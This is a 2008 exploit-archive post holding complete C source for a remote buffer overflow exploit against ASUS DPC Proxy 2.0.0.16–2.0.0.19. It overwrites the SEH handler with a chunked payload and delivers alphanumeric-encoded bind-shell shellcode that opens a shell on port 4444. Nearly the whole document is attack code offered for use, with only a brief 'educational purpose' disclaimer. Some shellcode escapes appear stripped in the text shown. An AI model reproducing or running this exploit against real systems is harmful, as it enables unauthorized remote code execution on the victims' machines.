asus-overflow.txt
Posted on 31 May 2008
/* Dreatica-FXP crew * * ---------------------------------------- * Target : ASUS DPC Proxy 2.0.0.16/2.0.0.24 * ---------------------------------------- * Exploit : ASUS DPC Proxy 2.0.0.16/2.0.0.19 Remote Buffer Overflow Exploit * Exploit date : 02.04.2008 * Exploit writer : Heretic2 (heretic2x@gmail.com) * OS : Windows ALL * Crew : Dreatica-FXP * Location : http://www.milw0rm.com/ * ---------------------------------------- * Info : Sending long buufer(however the buffer should be send by chunks) * we obtain a SEH exploitation, due to server bytes stricts i decided * to use here a alphanumeric shellcodes and jumps. * ---------------------------------------- * Thanks to: * 1. Luigi Auriemma ( http://aluigi.org <aluigi [at] autistici.org> ) * 2. The Metasploit project ( http://metasploit.com ) * 3. ALPHA 2: Zero-tolerance ( <skylined [at] edup.tudelft.nl> ) * 4. Dreatica-FXP crew ( ) ************************************************************************************ * This was written for educational purpose only. Use it at your own risk. Author will be not be * responsible for any damage, caused by that code. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> #include <time.h> #pragma comment(lib,"ws2_32") void usage(char * s); void logo(); void end_logo(); void print_info_banner_line(const char * key, const char * val); void extract_ip_and_port( char * &remotehost, int * port, char * str); int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx); int hr2_connect(char * remotehost, int port, int timeout); int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout); int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout); int execute(struct _buf * abuf, char * remotehost, int port); struct _buf { unsigned char * ptr; unsigned int size; }; int construct_shellcode(int sh, struct _buf * shf, int target); int construct_buffer(struct _buf * shf, int target, struct _buf * abuf); // ----------------------------------------------------------------- // XGetopt.cpp Version 1.2 // ----------------------------------------------------------------- int getopt(int argc, char *argv[], char *optstring); char *optarg; // global argument pointer int optind = 0, opterr; // global argv index // ----------------------------------------------------------------- // ----------------------------------------------------------------- struct { const char * name; int length; char *shellcode; }shellcodes[]={ { "BindShell on 4444", /* * windows/shell_bind_tcp - 696 bytes * http://www.metasploit.com * Encoder: x86/alpha_mixed * EXITFUNC=seh, LPORT=4444 */ 696, "x89xe6xdbxddxd9x76xf4x5ex56x59x49x49x49x49x49" "x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a" "x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32" "x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49" "x4bx4cx43x5ax4ax4bx50x4dx4dx38x4ax59x4bx4fx4b" "x4fx4bx4fx43x50x4cx4bx42x4cx51x34x47x54x4cx4b" "x51x55x47x4cx4cx4bx43x4cx43x35x42x58x45x51x4a" "x4fx4cx4bx50x4fx44x58x4cx4bx51x4fx51x30x45x51" "x4ax4bx47x39x4cx4bx46x54x4cx4bx43x31x4ax4ex50" "x31x49x50x4ax39x4ex4cx4bx34x49x50x43x44x43x37" "x49x51x48x4ax44x4dx43x31x49x52x4ax4bx4bx44x47" "x4bx46x34x47x54x47x58x42x55x4bx55x4cx4bx51x4f" "x51x34x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4c" "x4bx51x4fx45x4cx45x51x4ax4bx43x33x46x4cx4cx4b" "x4cx49x42x4cx46x44x45x4cx43x51x48x43x46x51x49" "x4bx42x44x4cx4bx51x53x50x30x4cx4bx51x50x44x4c" "x4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50x44x48x51" "x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx50x50x4bx4f" "x4ex36x42x46x51x43x45x36x42x48x50x33x47x42x45" "x38x44x37x44x33x47x42x51x4fx50x54x4bx4fx48x50" "x42x48x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx49" "x46x51x4fx4dx59x4dx35x43x56x4bx31x4ax4dx45x58" "x45x52x46x35x42x4ax44x42x4bx4fx48x50x43x58x4e" "x39x44x49x4bx45x4ex4dx50x57x4bx4fx4ex36x46x33" "x46x33x51x43x51x43x50x53x47x33x46x33x47x33x46" "x33x4bx4fx48x50x43x56x42x48x42x31x51x4cx45x36" "x51x43x4bx39x4dx31x4ax35x43x58x4ex44x44x5ax42" "x50x48x47x46x37x4bx4fx48x56x42x4ax42x30x50x51" "x50x55x4bx4fx4ex30x45x38x49x34x4ex4dx46x4ex4a" "x49x51x47x4bx4fx4ex36x51x43x50x55x4bx4fx4ex30" "x42x48x4ax45x51x59x4dx56x47x39x50x57x4bx4fx4e" "x36x50x50x46x34x50x54x46x35x4bx4fx48x50x4cx53" "x43x58x4bx57x42x59x49x56x42x59x50x57x4bx4fx48" "x56x51x45x4bx4fx4ex30x43x56x43x5ax43x54x42x46" "x43x58x45x33x42x4dx4bx39x4dx35x42x4ax46x30x51" "x49x51x39x48x4cx4cx49x4dx37x43x5ax50x44x4cx49" "x4ax42x46x51x49x50x4cx33x4ex4ax4bx4ex50x42x46" "x4dx4bx4ex47x32x46x4cx4ax33x4cx4dx43x4ax50x38" "x4ex4bx4ex4bx4ex4bx43x58x43x42x4bx4ex48x33x42" "x36x4bx4fx42x55x47x34x4bx4fx48x56x51x4bx46x37" "x51x42x50x51x50x51x50x51x42x4ax45x51x46x31x50" "x51x46x35x50x51x4bx4fx48x50x45x38x4ex4dx4ex39" "x43x35x48x4ex50x53x4bx4fx4ex36x43x5ax4bx4fx4b" "x4fx47x47x4bx4fx48x50x4cx4bx51x47x4bx4cx4cx43" "x49x54x42x44x4bx4fx48x56x51x42x4bx4fx4ex30x42" "x48x4cx30x4cx4ax44x44x51x4fx50x53x4bx4fx48x56" "x4bx4fx48x50x41x41" }, {NULL, 0, NULL} }; struct _target{ const char *t ; unsigned long ret ; } targets[]= { {"ASUS DpcProxy 2.0.0.16/2.0.0.19", 0x0040273b }, {"DOS/Crash/Debug/Test/Fun", 0x00400101 }, {NULL, 0x00000000 } }; // memory for buffers unsigned char payloadbuffer[10000], a_buffer[10000]; long dwTimeout=5000; int timeout=5000; int main(int argc, char **argv) { char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100]; int sh,port=623,itarget=0; struct _buf fshellcode, sbuffer; logo(); if(argc<2) { usage(argv[0]); return -1; } WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa); // set defaults sh=0; // ------------ while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF) { switch (c) { case 'h': if (strchr(optarg,':')==NULL) { remotehost=optarg; }else { sscanf(strchr(optarg,':')+1, "%d", &port); remotehost=optarg; *(strchr(remotehost,':'))='�'; } break; case 't': sscanf(optarg, "%d", &itarget); itarget--; break; case 'T': sscanf(optarg, "%ld", &dwTimeout); break; default: usage(argv[0]); WSACleanup(); return -1; } } if(remotehost == NULL) { printf(" [-] Please enter remotehost "); end_logo(); WSACleanup(); return -1; } print_info_banner_line("Host", remotehost); sprintf(temp1, "%d", port); print_info_banner_line("Port", temp1); print_info_banner_line("Payload", shellcodes[sh].name); if(sh==0) { sprintf(temp1, "%d", 4444); print_info_banner_line("BINDPort", temp1); } printf(" # ------------------------------------------------------------------- # "); fflush(stdout); memset(payloadbuffer, 0, sizeof(payloadbuffer)); fshellcode.ptr=payloadbuffer; fshellcode.size=0; memset(a_buffer, 0, sizeof(a_buffer)); sbuffer.ptr=a_buffer; sbuffer.size=0; if(!construct_shellcode(sh, &fshellcode, itarget)) { end_logo(); WSACleanup(); return -1; } printf(" [+] Payload constructed "); if(!construct_buffer(&fshellcode, itarget, &sbuffer)) { printf(" [-] Buffer not constructed "); end_logo(); WSACleanup(); return -1; } printf(" [+] Final buffer constructed "); if(!execute(&sbuffer, remotehost, port)) { printf(" [-] Buffer not sent "); end_logo(); WSACleanup(); return -1; } printf(" [+] Buffer sent "); end_logo(); WSACleanup(); return 0; } int construct_shellcode(int sh, struct _buf * shf, int target) { memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length); shf->size=shellcodes[sh].length; return 1; } char JMPX[] = // get ecx "x89xE6xDBxDDxD9x76xF4x59" // alphanum-decoder "x49x49x49" "x49x49x49x49x49x49x49x49x49x49x49x37x51x5ax6ax41" "x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42" "x30x42x42x41x42x58x50x38x41x42x75x4ax49" // encoded jump "x59x6fx7ax47x41" // back jump "x89xE6xDBxDDxD9x76xF4x5fx81xefxf8x1ax00x00xebxb3"; int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf) { unsigned char * cp = sbuf->ptr; memset(cp, 'A', 1000); cp+=20; memcpy(cp, shf->ptr, shf->size); cp+=1000-20; memset(cp, 'B', 1000); cp+=1000; memset(cp, 'C', 1000); cp+=1000; memset(cp, 'D', 1000); cp+=1000; memset(cp, 'E', 1000); cp+=1000; memset(cp, 'F', 1000); cp+=1000; memset(cp, 'G', 1000-62-sizeof(JMPX)+1); cp+=1000-62-sizeof(JMPX)+1; // code to jump back memcpy(cp, JMPX,sizeof(JMPX)-1); cp+=sizeof(JMPX)-1; // next SEH record and back jump *cp++='x90'; *cp++='x90'; *cp++='xeb'; *cp++='xec'; // replace SEH *cp++ = (char)((targets[target].ret ) & 0xff); *cp++ = (char)((targets[target].ret >> 8) & 0xff); *cp++ = (char)((targets[target].ret >> 16) & 0xff); *cp++ = (char)((targets[target].ret >> 24) & 0xff); memset(cp, 'H', 1000); cp+=1000; sbuf->size=(int)(cp-sbuf->ptr); return 1; } void extract_ip_and_port( char * &remotehost, int * port, char * str) { if (strchr(str,':')==NULL) { remotehost=str; }else { sscanf(strchr(str,':')+1, "%d", port); remotehost=str; *(strchr(remotehost,':'))='�'; } } int hr2_connect(char * remotehost, int port, int timeout) { SOCKET s; struct hostent *host; struct sockaddr_in addr; TIMEVAL stTime; TIMEVAL *pstTime = NULL; fd_set x; int res; if (INFINITE != timeout) { stTime.tv_sec = timeout / 1000; stTime.tv_usec = timeout % 1000; pstTime = &stTime; } host = gethostbyname(remotehost); if (!host) return SOCKET_ERROR; addr.sin_addr = *(struct in_addr*)host->h_addr; addr.sin_port = htons(port); addr.sin_family = AF_INET; s = socket(AF_INET, SOCK_STREAM, 0); if (s == SOCKET_ERROR) { closesocket(s); return SOCKET_ERROR; } unsigned long l = 1; ioctlsocket( s, FIONBIO, &l ) ; connect(s, (struct sockaddr*)&addr, sizeof(addr)); FD_ZERO(&x); FD_SET(s, &x); res = select(NULL,NULL,&x,NULL,pstTime); if(res< 0) return SOCKET_ERROR; if(res==0) return 0; return (int)s; } int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout) { return send(s, (char *)buf, len, 0); } int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout) { TIMEVAL stTime; TIMEVAL *pstTime = NULL; fd_set xy; int res; if (INFINITE != timeout) { stTime.tv_sec = timeout / 1000; stTime.tv_usec = timeout % 1000; pstTime = &stTime; } FD_ZERO(&xy); FD_SET(s, &xy); res = select(NULL,&xy,NULL,NULL,pstTime); if(res==0) return 0; if(res<0) return -1; return recv(s, (char *)buf, len, 0); } int execute(struct _buf * abuf, char * remotehost, int port) { int x; SOCKET s ; unsigned char rbuf[7000]; unsigned int i; int rsize=7000; s = hr2_connect(remotehost, port, 10000); if(s==0) { printf(" [-] connect() timeout "); return 0; } if(s==SOCKET_ERROR) { printf(" [-] Connection failed "); return 0; } x = hr2_tcprecv(s, rbuf, 5000, 10000); x = hr2_tcprecv(s, rbuf, 5000, 10000); for(i=0;i<abuf->size/1000;i++) { printf(" [+] Chunk %d/%d sent ", i+1,abuf->size/1000); x = hr2_tcpsend(s, abuf->ptr+1000*i, 1000, 0); if(x<1000) return -1; Sleep(1000); x = hr2_tcprecv(s, rbuf, 5000, 10000); } return 1; } // ----------------------------------------------------------------- // XGetopt.cpp Version 1.2 // ----------------------------------------------------------------- int getopt(int argc, char *argv[], char *optstring) { static char *next = NULL; if (optind == 0) next = NULL; optarg = NULL; if (next == NULL || *next == '�') { if (optind == 0) optind++; if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '�') { optarg = NULL; if (optind < argc) optarg = argv[optind]; return EOF; } if (strcmp(argv[optind], "--") == 0) { optind++; optarg = NULL; if (optind < argc) optarg = argv[optind]; return EOF; } next = argv[optind]; next++; // skip past - optind++; } char c = *next++; char *cp = strchr(optstring, c); if (cp == NULL || c == ':') return '?'; cp++; if (*cp == ':') { if (*next != '�') { optarg = next; next = NULL; } else if (optind < argc) { optarg = argv[optind]; optind++; } else { return '?'; } } return c; } // ----------------------------------------------------------------- // ----------------------------------------------------------------- // ----------------------------------------------------------------- void print_info_banner_line(const char * key, const char * val) { char temp1[100], temp2[100]; memset(temp1,0,sizeof(temp1)); memset(temp1, 'x20' , 58 - strlen(val) -1); memset(temp2,0,sizeof(temp2)); memset(temp2, 'x20' , 8 - strlen(key)); printf(" # %s%s: %s%s# ", key, temp2, val, temp1); } void usage(char * s) { int j; printf(" "); printf(" Usage: %s -h <host:port> -t <target> ", s); printf(" ------------------------------------------------------------------- "); printf(" Arguments: "); printf(" -h ........ host to attack, default port: 623 "); printf(" -t ........ target to use "); printf(" -T ........ socket timeout "); printf(" "); printf(" Supported ASUS DPCProxy versions: "); for(j=0; targets[j].t!=0;j++) { printf(" %d. %s ",j+1, targets[j].t); } printf(" "); for(j=0; shellcodes[j].name!=0;j++) { printf(" %d. %s ",j+1, shellcodes[j].name); } end_logo(); } void logo() { printf(" "); printf(" ####################################################################### "); printf(" # ____ __ _ ______ __ _____ # "); printf(" # / __ \________ _____/ /_(_)_________ / __/\ \/ / / _ / # "); printf(" # / / / / ___/ _ \/ __ / __/ / ___/ __ / ___ / / \ / / // / # "); printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \ / ___/ # "); printf(" # /_____/_/ \___/ \_,_/\__/_/\___/\__,_/ /_/ /_/\_\/_/ # "); printf(" # crew # "); printf(" ####################################################################### "); printf(" # Exploit : ASUS DPCPROXY Service 2.0.0.16-19 # "); printf(" # Author : Heretic2 (http://www.dreatica.cl/) # "); printf(" # Version : 1.0 # "); printf(" # System : Windows ALL # "); printf(" # Date : 02.04.2008 - 04.04.2008 # "); printf(" # ------------------------------------------------------------------- # "); } void end_logo() { printf(" # ------------------------------------------------------------------- # "); printf(" # Dreatica-FXP crew [Heretic2] # "); printf(" ####################################################################### "); }
